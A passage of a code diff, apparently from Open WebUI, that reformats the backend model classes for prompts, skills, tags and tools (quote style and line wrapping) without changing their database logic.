+190,14 @@ def get_prompt_by_command( def get_prompts(self, db: Optional[Session] = None) -> list[PromptUserResponse]: with get_db_context(db) as db: - all_prompts = ( - db.query(Prompt) - .filter(Prompt.is_active == True) - .order_by(Prompt.updated_at.desc()) - .all() - ) + all_prompts = db.query(Prompt).filter(Prompt.is_active == True).order_by(Prompt.updated_at.desc()).all() user_ids = list(set(prompt.user_id for prompt in all_prompts)) prompt_ids = [prompt.id for prompt in all_prompts] users = Users.get_users_by_user_ids(user_ids, db=db) if user_ids else [] users_dict = {user.id: user for user in users} - grants_map = AccessGrants.get_grants_by_resources( - "prompt", prompt_ids, db=db - ) + grants_map = AccessGrants.get_grants_by_resources('prompt', prompt_ids, db=db) prompts = [] for prompt in all_prompts: @@ -232,28 +210,26 @@ def get_prompts(self, db: Optional[Session] = None) -> list[PromptUserResponse]: access_grants=grants_map.get(prompt.id, []), db=db, ).model_dump(), - "user": user.model_dump() if user else None, + 'user': user.model_dump() if user else None, } ) ) return prompts def get_prompts_by_user_id( - self, user_id: str, permission: str = "write", db: Optional[Session] = None + self, user_id: str, permission: str = 'write', db: Optional[Session] = None ) -> list[PromptUserResponse]: prompts = self.get_prompts(db=db) - user_group_ids = { - group.id for group in Groups.get_groups_by_member_id(user_id, db=db) - } + user_group_ids = {group.id for group in Groups.get_groups_by_member_id(user_id, db=db)} return [ prompt for prompt in prompts if prompt.user_id == user_id or AccessGrants.has_access( user_id=user_id, - resource_type="prompt", + resource_type='prompt', resource_id=prompt.id, permission=permission, user_group_ids=user_group_ids, @@ -276,22 +252,22 @@ def search_prompts( query = db.query(Prompt, User).outerjoin(User, User.id == Prompt.user_id) if filter: - query_key = filter.get("query") + query_key = filter.get('query') if query_key: query = query.filter( or_( - Prompt.name.ilike(f"%{query_key}%"), - Prompt.command.ilike(f"%{query_key}%"), - Prompt.content.ilike(f"%{query_key}%"), - User.name.ilike(f"%{query_key}%"), - User.email.ilike(f"%{query_key}%"), + Prompt.name.ilike(f'%{query_key}%'), + Prompt.command.ilike(f'%{query_key}%'), + Prompt.content.ilike(f'%{query_key}%'), + User.name.ilike(f'%{query_key}%'), + User.email.ilike(f'%{query_key}%'), ) ) - view_option = filter.get("view_option") - if view_option == "created": + view_option = filter.get('view_option') + if view_option == 'created': query = query.filter(Prompt.user_id == user_id) - elif view_option == "shared": + elif view_option == 'shared': query = query.filter(Prompt.user_id != user_id) # Apply access grant filtering @@ -300,32 +276,32 @@ def search_prompts( query=query, DocumentModel=Prompt, filter=filter, - resource_type="prompt", - permission="read", + resource_type='prompt', + permission='read', ) - tag = filter.get("tag") + tag = filter.get('tag') if tag: # Search for tag in JSON array field like_pattern = f'%"{tag.lower()}"%' tags_text = func.lower(cast(Prompt.tags, String)) query = query.filter(tags_text.like(like_pattern)) - order_by = filter.get("order_by") - direction = filter.get("direction") + order_by = filter.get('order_by') + direction = filter.get('direction') - if order_by == "name": - if direction == "asc": + if order_by == 'name': + if direction == 'asc': query = query.order_by(Prompt.name.asc()) else: query = query.order_by(Prompt.name.desc()) - elif order_by == "created_at": - 
if direction == "asc": + elif order_by == 'created_at': + if direction == 'asc': query = query.order_by(Prompt.created_at.asc()) else: query = query.order_by(Prompt.created_at.desc()) - elif order_by == "updated_at": - if direction == "asc": + elif order_by == 'updated_at': + if direction == 'asc': query = query.order_by(Prompt.updated_at.asc()) else: query = query.order_by(Prompt.updated_at.desc()) @@ -345,9 +321,7 @@ def search_prompts( items = query.all() prompt_ids = [prompt.id for prompt, _ in items] - grants_map = AccessGrants.get_grants_by_resources( - "prompt", prompt_ids, db=db - ) + grants_map = AccessGrants.get_grants_by_resources('prompt', prompt_ids, db=db) prompts = [] for prompt, user in items: @@ -358,11 +332,7 @@ def search_prompts( access_grants=grants_map.get(prompt.id, []), db=db, ).model_dump(), - user=( - UserResponse(**UserModel.model_validate(user).model_dump()) - if user - else None - ), + user=(UserResponse(**UserModel.model_validate(user).model_dump()) if user else None), ) ) @@ -381,9 +351,7 @@ def update_prompt_by_command( if not prompt: return None - latest_history = PromptHistories.get_latest_history_entry( - prompt.id, db=db - ) + latest_history = PromptHistories.get_latest_history_entry(prompt.id, db=db) parent_id = latest_history.id if latest_history else None current_access_grants = self._get_access_grants(prompt.id, db=db) @@ -401,24 +369,20 @@ def update_prompt_by_command( prompt.meta = form_data.meta or prompt.meta prompt.updated_at = int(time.time()) if form_data.access_grants is not None: - AccessGrants.set_access_grants( - "prompt", prompt.id, form_data.access_grants, db=db - ) + AccessGrants.set_access_grants('prompt', prompt.id, form_data.access_grants, db=db) current_access_grants = self._get_access_grants(prompt.id, db=db) db.commit() # Create history entry only if content changed if content_changed: snapshot = { - "name": form_data.name, - "content": form_data.content, - "command": command, - "data": form_data.data or {}, - "meta": form_data.meta or {}, - "access_grants": [ - grant.model_dump() for grant in current_access_grants - ], + 'name': form_data.name, + 'content': form_data.content, + 'command': command, + 'data': form_data.data or {}, + 'meta': form_data.meta or {}, + 'access_grants': [grant.model_dump() for grant in current_access_grants], } history_entry = PromptHistories.create_history_entry( @@ -452,9 +416,7 @@ def update_prompt_by_id( if not prompt: return None - latest_history = PromptHistories.get_latest_history_entry( - prompt.id, db=db - ) + latest_history = PromptHistories.get_latest_history_entry(prompt.id, db=db) parent_id = latest_history.id if latest_history else None current_access_grants = self._get_access_grants(prompt.id, db=db) @@ -478,9 +440,7 @@ def update_prompt_by_id( prompt.tags = form_data.tags if form_data.access_grants is not None: - AccessGrants.set_access_grants( - "prompt", prompt.id, form_data.access_grants, db=db - ) + AccessGrants.set_access_grants('prompt', prompt.id, form_data.access_grants, db=db) current_access_grants = self._get_access_grants(prompt.id, db=db) prompt.updated_at = int(time.time()) @@ -490,15 +450,13 @@ def update_prompt_by_id( # Create history entry only if content changed if content_changed: snapshot = { - "name": form_data.name, - "content": form_data.content, - "command": prompt.command, - "data": form_data.data or {}, - "meta": form_data.meta or {}, - "tags": prompt.tags or [], - "access_grants": [ - grant.model_dump() for grant in current_access_grants - ], + 'name': 
form_data.name, + 'content': form_data.content, + 'command': prompt.command, + 'data': form_data.data or {}, + 'meta': form_data.meta or {}, + 'tags': prompt.tags or [], + 'access_grants': [grant.model_dump() for grant in current_access_grants], } history_entry = PromptHistories.create_history_entry( @@ -560,21 +518,19 @@ def update_prompt_version( if not prompt: return None - history_entry = PromptHistories.get_history_entry_by_id( - version_id, db=db - ) + history_entry = PromptHistories.get_history_entry_by_id(version_id, db=db) if not history_entry: return None # Restore prompt content from the snapshot snapshot = history_entry.snapshot if snapshot: - prompt.name = snapshot.get("name", prompt.name) - prompt.content = snapshot.get("content", prompt.content) - prompt.data = snapshot.get("data", prompt.data) - prompt.meta = snapshot.get("meta", prompt.meta) - prompt.tags = snapshot.get("tags", prompt.tags) + prompt.name = snapshot.get('name', prompt.name) + prompt.content = snapshot.get('content', prompt.content) + prompt.data = snapshot.get('data', prompt.data) + prompt.meta = snapshot.get('meta', prompt.meta) + prompt.tags = snapshot.get('tags', prompt.tags) # Note: command and access_grants are not restored from snapshot prompt.version_id = version_id @@ -585,9 +541,7 @@ def update_prompt_version( except Exception: return None - def toggle_prompt_active( - self, prompt_id: str, db: Optional[Session] = None - ) -> Optional[PromptModel]: + def toggle_prompt_active(self, prompt_id: str, db: Optional[Session] = None) -> Optional[PromptModel]: """Toggle the is_active flag on a prompt.""" try: with get_db_context(db) as db: @@ -602,16 +556,14 @@ def toggle_prompt_active( except Exception: return None - def delete_prompt_by_command( - self, command: str, db: Optional[Session] = None - ) -> bool: + def delete_prompt_by_command(self, command: str, db: Optional[Session] = None) -> bool: """Permanently delete a prompt and its history.""" try: with get_db_context(db) as db: prompt = db.query(Prompt).filter_by(command=command).first() if prompt: PromptHistories.delete_history_by_prompt_id(prompt.id, db=db) - AccessGrants.revoke_all_access("prompt", prompt.id, db=db) + AccessGrants.revoke_all_access('prompt', prompt.id, db=db) db.delete(prompt) db.commit() @@ -627,7 +579,7 @@ def delete_prompt_by_id(self, prompt_id: str, db: Optional[Session] = None) -> b prompt = db.query(Prompt).filter_by(id=prompt_id).first() if prompt: PromptHistories.delete_history_by_prompt_id(prompt.id, db=db) - AccessGrants.revoke_all_access("prompt", prompt.id, db=db) + AccessGrants.revoke_all_access('prompt', prompt.id, db=db) db.delete(prompt) db.commit()
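update_prompt_version above restores fields from a stored snapshot, falling back to the current value when a key is missing, and deliberately leaves command and access_grants untouched. A plain-Python sketch of that restore step, with Prompt as a stand-in for the ORM row:

from dataclasses import dataclass, field

@dataclass
class Prompt:
    name: str
    content: str
    command: str
    tags: list = field(default_factory=list)

def restore_from_snapshot(prompt, snapshot):
    prompt.name = snapshot.get('name', prompt.name)
    prompt.content = snapshot.get('content', prompt.content)
    prompt.tags = snapshot.get('tags', prompt.tags)
    # command (and access grants) are intentionally not restored
    return prompt

prompt = Prompt(name='v2', content='new text', command='/greet', tags=['demo'])
snapshot = {'name': 'v1', 'content': 'old text'}  # no 'tags' key -> keep current
print(restore_from_snapshot(prompt, snapshot))
# Prompt(name='v1', content='old text', command='/greet', tags=['demo'])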
backend/open_webui/models/skills.py+40 −68 modified@@ -19,7 +19,7 @@ class Skill(Base): - __tablename__ = "skill" + __tablename__ = 'skill' id = Column(String, primary_key=True, unique=True) user_id = Column(String) @@ -77,7 +77,7 @@ class SkillResponse(BaseModel): class SkillUserResponse(SkillResponse): user: Optional[UserResponse] = None - model_config = ConfigDict(extra="allow") + model_config = ConfigDict(extra='allow') class SkillAccessResponse(SkillUserResponse): @@ -105,24 +105,18 @@ class SkillAccessListResponse(BaseModel): class SkillsTable: - def _get_access_grants( - self, skill_id: str, db: Optional[Session] = None - ) -> list[AccessGrantModel]: - return AccessGrants.get_grants_by_resource("skill", skill_id, db=db) + def _get_access_grants(self, skill_id: str, db: Optional[Session] = None) -> list[AccessGrantModel]: + return AccessGrants.get_grants_by_resource('skill', skill_id, db=db) def _to_skill_model( self, skill: Skill, access_grants: Optional[list[AccessGrantModel]] = None, db: Optional[Session] = None, ) -> SkillModel: - skill_data = SkillModel.model_validate(skill).model_dump( - exclude={"access_grants"} - ) - skill_data["access_grants"] = ( - access_grants - if access_grants is not None - else self._get_access_grants(skill_data["id"], db=db) + skill_data = SkillModel.model_validate(skill).model_dump(exclude={'access_grants'}) + skill_data['access_grants'] = ( + access_grants if access_grants is not None else self._get_access_grants(skill_data['id'], db=db) ) return SkillModel.model_validate(skill_data) @@ -136,39 +130,33 @@ def insert_new_skill( try: result = Skill( **{ - **form_data.model_dump(exclude={"access_grants"}), - "user_id": user_id, - "updated_at": int(time.time()), - "created_at": int(time.time()), + **form_data.model_dump(exclude={'access_grants'}), + 'user_id': user_id, + 'updated_at': int(time.time()), + 'created_at': int(time.time()), } ) db.add(result) db.commit() db.refresh(result) - AccessGrants.set_access_grants( - "skill", result.id, form_data.access_grants, db=db - ) + AccessGrants.set_access_grants('skill', result.id, form_data.access_grants, db=db) if result: return self._to_skill_model(result, db=db) else: return None except Exception as e: - log.exception(f"Error creating a new skill: {e}") + log.exception(f'Error creating a new skill: {e}') return None - def get_skill_by_id( - self, id: str, db: Optional[Session] = None - ) -> Optional[SkillModel]: + def get_skill_by_id(self, id: str, db: Optional[Session] = None) -> Optional[SkillModel]: try: with get_db_context(db) as db: skill = db.get(Skill, id) return self._to_skill_model(skill, db=db) if skill else None except Exception: return None - def get_skill_by_name( - self, name: str, db: Optional[Session] = None - ) -> Optional[SkillModel]: + def get_skill_by_name(self, name: str, db: Optional[Session] = None) -> Optional[SkillModel]: try: with get_db_context(db) as db: skill = db.query(Skill).filter_by(name=name).first() @@ -185,7 +173,7 @@ def get_skills(self, db: Optional[Session] = None) -> list[SkillUserModel]: users = Users.get_users_by_user_ids(user_ids, db=db) if user_ids else [] users_dict = {user.id: user for user in users} - grants_map = AccessGrants.get_grants_by_resources("skill", skill_ids, db=db) + grants_map = AccessGrants.get_grants_by_resources('skill', skill_ids, db=db) skills = [] for skill in all_skills: @@ -198,27 +186,25 @@ def get_skills(self, db: Optional[Session] = None) -> list[SkillUserModel]: access_grants=grants_map.get(skill.id, []), db=db, ).model_dump(), - 
"user": user.model_dump() if user else None, + 'user': user.model_dump() if user else None, } ) ) return skills def get_skills_by_user_id( - self, user_id: str, permission: str = "write", db: Optional[Session] = None + self, user_id: str, permission: str = 'write', db: Optional[Session] = None ) -> list[SkillUserModel]: skills = self.get_skills(db=db) - user_group_ids = { - group.id for group in Groups.get_groups_by_member_id(user_id, db=db) - } + user_group_ids = {group.id for group in Groups.get_groups_by_member_id(user_id, db=db)} return [ skill for skill in skills if skill.user_id == user_id or AccessGrants.has_access( user_id=user_id, - resource_type="skill", + resource_type='skill', resource_id=skill.id, permission=permission, user_group_ids=user_group_ids, @@ -242,22 +228,22 @@ def search_skills( query = db.query(Skill, User).outerjoin(User, User.id == Skill.user_id) if filter: - query_key = filter.get("query") + query_key = filter.get('query') if query_key: query = query.filter( or_( - Skill.name.ilike(f"%{query_key}%"), - Skill.description.ilike(f"%{query_key}%"), - Skill.id.ilike(f"%{query_key}%"), - User.name.ilike(f"%{query_key}%"), - User.email.ilike(f"%{query_key}%"), + Skill.name.ilike(f'%{query_key}%'), + Skill.description.ilike(f'%{query_key}%'), + Skill.id.ilike(f'%{query_key}%'), + User.name.ilike(f'%{query_key}%'), + User.email.ilike(f'%{query_key}%'), ) ) - view_option = filter.get("view_option") - if view_option == "created": + view_option = filter.get('view_option') + if view_option == 'created': query = query.filter(Skill.user_id == user_id) - elif view_option == "shared": + elif view_option == 'shared': query = query.filter(Skill.user_id != user_id) # Apply access grant filtering @@ -266,8 +252,8 @@ def search_skills( query=query, DocumentModel=Skill, filter=filter, - resource_type="skill", - permission="read", + resource_type='skill', + permission='read', ) query = query.order_by(Skill.updated_at.desc()) @@ -283,9 +269,7 @@ def search_skills( items = query.all() skill_ids = [skill.id for skill, _ in items] - grants_map = AccessGrants.get_grants_by_resources( - "skill", skill_ids, db=db - ) + grants_map = AccessGrants.get_grants_by_resources('skill', skill_ids, db=db) skills = [] for skill, user in items: @@ -296,43 +280,31 @@ def search_skills( access_grants=grants_map.get(skill.id, []), db=db, ).model_dump(), - user=( - UserResponse( - **UserModel.model_validate(user).model_dump() - ) - if user - else None - ), + user=(UserResponse(**UserModel.model_validate(user).model_dump()) if user else None), ) ) return SkillListResponse(items=skills, total=total) except Exception as e: - log.exception(f"Error searching skills: {e}") + log.exception(f'Error searching skills: {e}') return SkillListResponse(items=[], total=0) - def update_skill_by_id( - self, id: str, updated: dict, db: Optional[Session] = None - ) -> Optional[SkillModel]: + def update_skill_by_id(self, id: str, updated: dict, db: Optional[Session] = None) -> Optional[SkillModel]: try: with get_db_context(db) as db: - access_grants = updated.pop("access_grants", None) - db.query(Skill).filter_by(id=id).update( - {**updated, "updated_at": int(time.time())} - ) + access_grants = updated.pop('access_grants', None) + db.query(Skill).filter_by(id=id).update({**updated, 'updated_at': int(time.time())}) db.commit() if access_grants is not None: - AccessGrants.set_access_grants("skill", id, access_grants, db=db) + AccessGrants.set_access_grants('skill', id, access_grants, db=db) skill = db.query(Skill).get(id) 
db.refresh(skill) return self._to_skill_model(skill, db=db) except Exception: return None - def toggle_skill_by_id( - self, id: str, db: Optional[Session] = None - ) -> Optional[SkillModel]: + def toggle_skill_by_id(self, id: str, db: Optional[Session] = None) -> Optional[SkillModel]: with get_db_context(db) as db: try: skill = db.query(Skill).filter_by(id=id).first() @@ -351,7 +323,7 @@ def toggle_skill_by_id( def delete_skill_by_id(self, id: str, db: Optional[Session] = None) -> bool: try: with get_db_context(db) as db: - AccessGrants.revoke_all_access("skill", id, db=db) + AccessGrants.revoke_all_access('skill', id, db=db) db.query(Skill).filter_by(id=id).delete() db.commit()
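update_skill_by_id pops access_grants out of the incoming dict before running the bulk column update, because grants live in their own table and are written through AccessGrants.set_access_grants afterwards. A minimal sketch of that split; the field names are illustrative:

import time

def split_update(updated):
    access_grants = updated.pop('access_grants', None)
    column_update = {**updated, 'updated_at': int(time.time())}
    return column_update, access_grants

cols, grants = split_update({'name': 'csv-export', 'access_grants': [{'group_id': 'g1'}]})
print(cols)    # only real Skill columns, plus the refreshed timestamp
print(grants)  # handed off to the grants API separately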
backend/open_webui/models/tags.py  +25 −53  modified

@@ -17,19 +17,19 @@ # Tag DB Schema
####################

class Tag(Base):
-    __tablename__ = "tag"
+    __tablename__ = 'tag'

    id = Column(String)
    name = Column(String)
    user_id = Column(String)
    meta = Column(JSON, nullable=True)

    __table_args__ = (
-        PrimaryKeyConstraint("id", "user_id", name="pk_id_user_id"),
-        Index("user_id_idx", "user_id"),
+        PrimaryKeyConstraint('id', 'user_id', name='pk_id_user_id'),
+        Index('user_id_idx', 'user_id'),
    )

    # Unique constraint ensuring (id, user_id) is unique, not just the `id` column
-    __table_args__ = (PrimaryKeyConstraint("id", "user_id", name="pk_id_user_id"),)
+    __table_args__ = (PrimaryKeyConstraint('id', 'user_id', name='pk_id_user_id'),)


class TagModel(BaseModel):
@@ -51,12 +51,10 @@ class TagChatIdForm(BaseModel):

class TagTable:
-    def insert_new_tag(
-        self, name: str, user_id: str, db: Optional[Session] = None
-    ) -> Optional[TagModel]:
+    def insert_new_tag(self, name: str, user_id: str, db: Optional[Session] = None) -> Optional[TagModel]:
        with get_db_context(db) as db:
-            id = name.replace(" ", "_").lower()
-            tag = TagModel(**{"id": id, "user_id": user_id, "name": name})
+            id = name.replace(' ', '_').lower()
+            tag = TagModel(**{'id': id, 'user_id': user_id, 'name': name})
            try:
                result = Tag(**tag.model_dump())
                db.add(result)
@@ -67,89 +65,63 @@ def insert_new_tag(
            else:
                return None
        except Exception as e:
-            log.exception(f"Error inserting a new tag: {e}")
+            log.exception(f'Error inserting a new tag: {e}')
            return None

-    def get_tag_by_name_and_user_id(
-        self, name: str, user_id: str, db: Optional[Session] = None
-    ) -> Optional[TagModel]:
+    def get_tag_by_name_and_user_id(self, name: str, user_id: str, db: Optional[Session] = None) -> Optional[TagModel]:
        try:
-            id = name.replace(" ", "_").lower()
+            id = name.replace(' ', '_').lower()
            with get_db_context(db) as db:
                tag = db.query(Tag).filter_by(id=id, user_id=user_id).first()
                return TagModel.model_validate(tag)
        except Exception:
            return None

-    def get_tags_by_user_id(
-        self, user_id: str, db: Optional[Session] = None
-    ) -> list[TagModel]:
+    def get_tags_by_user_id(self, user_id: str, db: Optional[Session] = None) -> list[TagModel]:
        with get_db_context(db) as db:
-            return [
-                TagModel.model_validate(tag)
-                for tag in (db.query(Tag).filter_by(user_id=user_id).all())
-            ]
+            return [TagModel.model_validate(tag) for tag in (db.query(Tag).filter_by(user_id=user_id).all())]

-    def get_tags_by_ids_and_user_id(
-        self, ids: list[str], user_id: str, db: Optional[Session] = None
-    ) -> list[TagModel]:
+    def get_tags_by_ids_and_user_id(self, ids: list[str], user_id: str, db: Optional[Session] = None) -> list[TagModel]:
        with get_db_context(db) as db:
            return [
                TagModel.model_validate(tag)
-                for tag in (
-                    db.query(Tag).filter(Tag.id.in_(ids), Tag.user_id == user_id).all()
-                )
+                for tag in (db.query(Tag).filter(Tag.id.in_(ids), Tag.user_id == user_id).all())
            ]

-    def delete_tag_by_name_and_user_id(
-        self, name: str, user_id: str, db: Optional[Session] = None
-    ) -> bool:
+    def delete_tag_by_name_and_user_id(self, name: str, user_id: str, db: Optional[Session] = None) -> bool:
        try:
            with get_db_context(db) as db:
-                id = name.replace(" ", "_").lower()
+                id = name.replace(' ', '_').lower()
                res = db.query(Tag).filter_by(id=id, user_id=user_id).delete()
-                log.debug(f"res: {res}")
+                log.debug(f'res: {res}')
                db.commit()
                return True
        except Exception as e:
-            log.error(f"delete_tag: {e}")
+            log.error(f'delete_tag: {e}')
            return False

-    def delete_tags_by_ids_and_user_id(
-        self, ids: list[str], user_id: str, db: Optional[Session] = None
-    ) -> bool:
+    def delete_tags_by_ids_and_user_id(self, ids: list[str], user_id: str, db: Optional[Session] = None) -> bool:
        """Delete all tags whose id is in *ids* for the given user, in one query."""
        if not ids:
            return True
        try:
            with get_db_context(db) as db:
-                db.query(Tag).filter(Tag.id.in_(ids), Tag.user_id == user_id).delete(
-                    synchronize_session=False
-                )
+                db.query(Tag).filter(Tag.id.in_(ids), Tag.user_id == user_id).delete(synchronize_session=False)
                db.commit()
                return True
        except Exception as e:
-            log.error(f"delete_tags_by_ids: {e}")
+            log.error(f'delete_tags_by_ids: {e}')
            return False

-    def ensure_tags_exist(
-        self, names: list[str], user_id: str, db: Optional[Session] = None
-    ) -> None:
+    def ensure_tags_exist(self, names: list[str], user_id: str, db: Optional[Session] = None) -> None:
        """Create tag rows for any *names* that don't already exist for *user_id*."""
        if not names:
            return
-        ids = [n.replace(" ", "_").lower() for n in names]
+        ids = [n.replace(' ', '_').lower() for n in names]
        with get_db_context(db) as db:
-            existing = {
-                t.id
-                for t in db.query(Tag.id)
-                .filter(Tag.id.in_(ids), Tag.user_id == user_id)
-                .all()
-            }
+            existing = {t.id for t in db.query(Tag.id).filter(Tag.id.in_(ids), Tag.user_id == user_id).all()}
            new_tags = [
-                Tag(id=tag_id, name=name, user_id=user_id)
-                for tag_id, name in zip(ids, names)
-                if tag_id not in existing
+                Tag(id=tag_id, name=name, user_id=user_id) for tag_id, name in zip(ids, names) if tag_id not in existing
            ]
            if new_tags:
                db.add_all(new_tags)
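One detail worth flagging in the Tag schema above: __table_args__ is assigned twice in the class body, in both the old and the new code, so the second tuple (primary key only) silently replaces the first (primary key plus the user_id index); only the last assignment takes effect. The batch behavior of ensure_tags_exist can be exercised roughly like this (a sketch; Tags is assumed to be a module-level TagTable() instance, mirroring the other model modules):

    Tags = TagTable()  # assumed singleton, as in the other Open WebUI model files

    # Derives ids from names ('Reading List' -> 'reading_list'), skips
    # (id, user_id) pairs that already exist, and inserts the remainder
    # with a single add_all() instead of one INSERT per tag.
    Tags.ensure_tags_exist(["work", "Reading List"], user_id="user-123")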
backend/open_webui/models/tools.py  +45 −73  modified

@@ -19,7 +19,7 @@

class Tool(Base):
-    __tablename__ = "tool"
+    __tablename__ = 'tool'

    id = Column(String, primary_key=True, unique=True)
    user_id = Column(String)
@@ -75,7 +75,7 @@ class ToolResponse(BaseModel):

class ToolUserResponse(ToolResponse):
    user: Optional[UserResponse] = None
-    model_config = ConfigDict(extra="allow")
+    model_config = ConfigDict(extra='allow')


class ToolAccessResponse(ToolUserResponse):
@@ -95,22 +95,18 @@ class ToolValves(BaseModel):

class ToolsTable:
-    def _get_access_grants(
-        self, tool_id: str, db: Optional[Session] = None
-    ) -> list[AccessGrantModel]:
-        return AccessGrants.get_grants_by_resource("tool", tool_id, db=db)
+    def _get_access_grants(self, tool_id: str, db: Optional[Session] = None) -> list[AccessGrantModel]:
+        return AccessGrants.get_grants_by_resource('tool', tool_id, db=db)

    def _to_tool_model(
        self,
        tool: Tool,
        access_grants: Optional[list[AccessGrantModel]] = None,
        db: Optional[Session] = None,
    ) -> ToolModel:
-        tool_data = ToolModel.model_validate(tool).model_dump(exclude={"access_grants"})
-        tool_data["access_grants"] = (
-            access_grants
-            if access_grants is not None
-            else self._get_access_grants(tool_data["id"], db=db)
+        tool_data = ToolModel.model_validate(tool).model_dump(exclude={'access_grants'})
+        tool_data['access_grants'] = (
+            access_grants if access_grants is not None else self._get_access_grants(tool_data['id'], db=db)
        )
        return ToolModel.model_validate(tool_data)

@@ -125,40 +121,34 @@ def insert_new_tool(
        try:
            result = Tool(
                **{
-                    **form_data.model_dump(exclude={"access_grants"}),
-                    "specs": specs,
-                    "user_id": user_id,
-                    "updated_at": int(time.time()),
-                    "created_at": int(time.time()),
+                    **form_data.model_dump(exclude={'access_grants'}),
+                    'specs': specs,
+                    'user_id': user_id,
+                    'updated_at': int(time.time()),
+                    'created_at': int(time.time()),
                }
            )
            db.add(result)
            db.commit()
            db.refresh(result)

-            AccessGrants.set_access_grants(
-                "tool", result.id, form_data.access_grants, db=db
-            )
+            AccessGrants.set_access_grants('tool', result.id, form_data.access_grants, db=db)

            if result:
                return self._to_tool_model(result, db=db)
            else:
                return None
        except Exception as e:
-            log.exception(f"Error creating a new tool: {e}")
+            log.exception(f'Error creating a new tool: {e}')
            return None

-    def get_tool_by_id(
-        self, id: str, db: Optional[Session] = None
-    ) -> Optional[ToolModel]:
+    def get_tool_by_id(self, id: str, db: Optional[Session] = None) -> Optional[ToolModel]:
        try:
            with get_db_context(db) as db:
                tool = db.get(Tool, id)
                return self._to_tool_model(tool, db=db) if tool else None
        except Exception:
            return None

-    def get_tools(
-        self, defer_content: bool = False, db: Optional[Session] = None
-    ) -> list[ToolUserModel]:
+    def get_tools(self, defer_content: bool = False, db: Optional[Session] = None) -> list[ToolUserModel]:
        with get_db_context(db) as db:
            query = db.query(Tool).order_by(Tool.updated_at.desc())
            if defer_content:
@@ -170,7 +160,7 @@ def get_tools(
            users = Users.get_users_by_user_ids(user_ids, db=db) if user_ids else []
            users_dict = {user.id: user for user in users}

-            grants_map = AccessGrants.get_grants_by_resources("tool", tool_ids, db=db)
+            grants_map = AccessGrants.get_grants_by_resources('tool', tool_ids, db=db)

            tools = []
            for tool in all_tools:
@@ -183,7 +173,7 @@ def get_tools(
                            access_grants=grants_map.get(tool.id, []),
                            db=db,
                        ).model_dump(),
-                        "user": user.model_dump() if user else None,
+                        'user': user.model_dump() if user else None,
                    }
                )
            )
@@ -192,71 +182,59 @@ def get_tools_by_user_id(
    def get_tools_by_user_id(
        self,
        user_id: str,
-        permission: str = "write",
+        permission: str = 'write',
        defer_content: bool = False,
        db: Optional[Session] = None,
    ) -> list[ToolUserModel]:
        tools = self.get_tools(defer_content=defer_content, db=db)
-        user_group_ids = {
-            group.id for group in Groups.get_groups_by_member_id(user_id, db=db)
-        }
+        user_group_ids = {group.id for group in Groups.get_groups_by_member_id(user_id, db=db)}

        return [
            tool
            for tool in tools
            if tool.user_id == user_id
            or AccessGrants.has_access(
                user_id=user_id,
-                resource_type="tool",
+                resource_type='tool',
                resource_id=tool.id,
                permission=permission,
                user_group_ids=user_group_ids,
                db=db,
            )
        ]

-    def get_tool_valves_by_id(
-        self, id: str, db: Optional[Session] = None
-    ) -> Optional[dict]:
+    def get_tool_valves_by_id(self, id: str, db: Optional[Session] = None) -> Optional[dict]:
        try:
            with get_db_context(db) as db:
                tool = db.get(Tool, id)
                return tool.valves if tool.valves else {}
        except Exception as e:
-            log.exception(f"Error getting tool valves by id {id}")
+            log.exception(f'Error getting tool valves by id {id}')
            return None

-    def update_tool_valves_by_id(
-        self, id: str, valves: dict, db: Optional[Session] = None
-    ) -> Optional[ToolValves]:
+    def update_tool_valves_by_id(self, id: str, valves: dict, db: Optional[Session] = None) -> Optional[ToolValves]:
        try:
            with get_db_context(db) as db:
-                db.query(Tool).filter_by(id=id).update(
-                    {"valves": valves, "updated_at": int(time.time())}
-                )
+                db.query(Tool).filter_by(id=id).update({'valves': valves, 'updated_at': int(time.time())})
                db.commit()
                return self.get_tool_by_id(id, db=db)
        except Exception:
            return None

-    def get_user_valves_by_id_and_user_id(
-        self, id: str, user_id: str, db: Optional[Session] = None
-    ) -> Optional[dict]:
+    def get_user_valves_by_id_and_user_id(self, id: str, user_id: str, db: Optional[Session] = None) -> Optional[dict]:
        try:
            user = Users.get_user_by_id(user_id, db=db)
            user_settings = user.settings.model_dump() if user.settings else {}

            # Check if user has "tools" and "valves" settings
-            if "tools" not in user_settings:
-                user_settings["tools"] = {}
-            if "valves" not in user_settings["tools"]:
-                user_settings["tools"]["valves"] = {}
+            if 'tools' not in user_settings:
+                user_settings['tools'] = {}
+            if 'valves' not in user_settings['tools']:
+                user_settings['tools']['valves'] = {}

-            return user_settings["tools"]["valves"].get(id, {})
+            return user_settings['tools']['valves'].get(id, {})
        except Exception as e:
-            log.exception(
-                f"Error getting user values by id {id} and user_id {user_id}: {e}"
-            )
+            log.exception(f'Error getting user values by id {id} and user_id {user_id}: {e}')
            return None

    def update_user_valves_by_id_and_user_id(
@@ -267,35 +245,29 @@ def update_user_valves_by_id_and_user_id(
            user_settings = user.settings.model_dump() if user.settings else {}

            # Check if user has "tools" and "valves" settings
-            if "tools" not in user_settings:
-                user_settings["tools"] = {}
-            if "valves" not in user_settings["tools"]:
-                user_settings["tools"]["valves"] = {}
+            if 'tools' not in user_settings:
+                user_settings['tools'] = {}
+            if 'valves' not in user_settings['tools']:
+                user_settings['tools']['valves'] = {}

-            user_settings["tools"]["valves"][id] = valves
+            user_settings['tools']['valves'][id] = valves

            # Update the user settings in the database
-            Users.update_user_by_id(user_id, {"settings": user_settings}, db=db)
+            Users.update_user_by_id(user_id, {'settings': user_settings}, db=db)

-            return user_settings["tools"]["valves"][id]
+            return user_settings['tools']['valves'][id]
        except Exception as e:
-            log.exception(
-                f"Error updating user valves by id {id} and user_id {user_id}: {e}"
-            )
+            log.exception(f'Error updating user valves by id {id} and user_id {user_id}: {e}')
            return None

-    def update_tool_by_id(
-        self, id: str, updated: dict, db: Optional[Session] = None
-    ) -> Optional[ToolModel]:
+    def update_tool_by_id(self, id: str, updated: dict, db: Optional[Session] = None) -> Optional[ToolModel]:
        try:
            with get_db_context(db) as db:
-                access_grants = updated.pop("access_grants", None)
-                db.query(Tool).filter_by(id=id).update(
-                    {**updated, "updated_at": int(time.time())}
-                )
+                access_grants = updated.pop('access_grants', None)
+                db.query(Tool).filter_by(id=id).update({**updated, 'updated_at': int(time.time())})
                db.commit()

                if access_grants is not None:
-                    AccessGrants.set_access_grants("tool", id, access_grants, db=db)
+                    AccessGrants.set_access_grants('tool', id, access_grants, db=db)

                tool = db.query(Tool).get(id)
                db.refresh(tool)
@@ -306,7 +278,7 @@ def update_tool_by_id(
    def delete_tool_by_id(self, id: str, db: Optional[Session] = None) -> bool:
        try:
            with get_db_context(db) as db:
